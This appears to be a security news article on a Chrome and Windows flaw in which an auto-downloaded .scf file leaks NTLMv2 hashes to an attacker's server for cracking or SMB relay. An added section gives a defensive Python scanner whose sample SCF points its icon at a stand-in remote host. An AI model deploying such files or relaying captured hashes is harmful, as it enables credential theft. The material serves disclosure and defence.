
Stealing Credentials/Data from Windows Using Google Chrome

A bug in Google’s Chrome browser lets attackers automatically download a malicious file onto a victim’s PC that could be used to steal credentials and launch SMB relay attacks.

Bosko Stankovic, information security engineer at DefenseCode, found the flaw in the default configuration of the latest version of Chrome running on an updated version of Microsoft’s Windows 10 operating system.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” he wrote Monday in a description of the vulnerability.


The technique lets an attacker obtain a victim’s username and Microsoft LAN Manager (NTLMv2) password hash. That leaves victims open to a variety of attacks, including a Server Message Block (SMB) relay attack. An SMB relay attack lets an adversary use a victim’s credentials to authenticate to a PC or network resource, such as email or a remote server.

Attackers could also use this vulnerability to attempt to crack the target’s hashed password. DefenseCode said it did not notify Google of the vulnerability. When Threatpost asked Google to comment, a spokesperson said: “We’re mindful of this and taking the essential activities.” Google did not elaborate.

According to Stankovic, the browser attack is simple.

First, a victim is enticed to click on a specially crafted link that triggers an automatic download of a Windows Explorer Shell Command File, or SCF file (.scf), onto the victim’s PC. The file is automatically downloaded to the target’s C:\Users\%Username%\Downloads folder.


Once the .scf file is downloaded into the Downloads directory, it lies dormant. However, once the user opens the Downloads folder in Windows, the SCF file tries to retrieve data associated with a Windows icon located on the attacker’s server.


When the SCF file attempts to retrieve the remote icon file data, it gives the attacker’s server the victim’s username and a hashed version of the victim’s password. If the victim is part of a corporate network, the username and password are the network username and password assigned to the victim by the company’s system administrator. If the victim is a home user, the SCF file’s request for the icon data is associated with the home user’s Windows username and password.


Researchers independent of DefenseCode point out that the vulnerability is not tied solely to the way the Chrome browser handles SCF files, but also to the way Windows handles them.


According to Stankovic, SCF is a lesser-known file type going back as far as Windows 98, where it was primarily used as a “Show Desktop” shortcut. “It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location,” Stankovic said.
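A defender can triage a Downloads folder for this pattern by parsing each .scf file and flagging an icon reference that points at a network host. The sketch below is an added example, not code from DefenseCode or the original article; the `IconFile` key comes from the SCF format rather than from the text above, and both sample files are constructed.

```python
"""Flag .scf files whose icon reference points at a remote (UNC) path."""
import re
import sys
from pathlib import Path

# \\host\share or //host/share: a path Explorer resolves over the network.
UNC_RE = re.compile(r'^(?:\\\\|//)([^\\/]+)[\\/]')


def remote_icon_host(scf_text):
    """Return the host named by a remote IconFile value, or None if local."""
    for raw in scf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((';', '[')):
            continue  # skip blanks, comments and section headers
        key, sep, value = line.partition('=')
        if sep and key.strip().lower() == 'iconfile':
            match = UNC_RE.match(value.strip().strip('"'))
            if match:
                return match.group(1)
    return None


def scan_folder(folder):
    """Yield (path, host) for every .scf file in folder with a remote icon."""
    for path in sorted(Path(folder).iterdir()):
        if not (path.is_file() and path.suffix.lower() == '.scf'):
            continue
        data = path.read_bytes()
        # Text files saved by Windows tools may be UTF-16 with a BOM.
        enc = 'utf-16' if data[:2] in (b'\xff\xfe', b'\xfe\xff') else 'utf-8'
        host = remote_icon_host(data.decode(enc, errors='replace'))
        if host:
            yield path, host


# Constructed samples; 192.0.2.10 is a documentation-only address.
BENIGN = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPECT = "[Shell]\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n[Taskbar]\nCommand=ToggleDesktop\n"

if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else Path.home() / 'Downloads'
    for scf_path, icon_host in scan_folder(target):
        print(f'{scf_path}: icon is loaded from remote host {icon_host}')
```

Run it with a folder path as the only argument; with no argument it checks the current user's Downloads folder.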


Researchers say this type of attack could be used maliciously to attempt to crack the hashed password. The attacker could also use the credential request in an SMB relay attack. Under that scenario, an attacker could forward the credential request to attempt to access NTLM-enabled services on a corporate network, such as email or network access.


“Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without cracking the password,” Stankovic said.


To protect against the attack in Google Chrome, DefenseCode recommends going to Settings > Show advanced settings and checking the “Ask where to save each file before downloading” option.




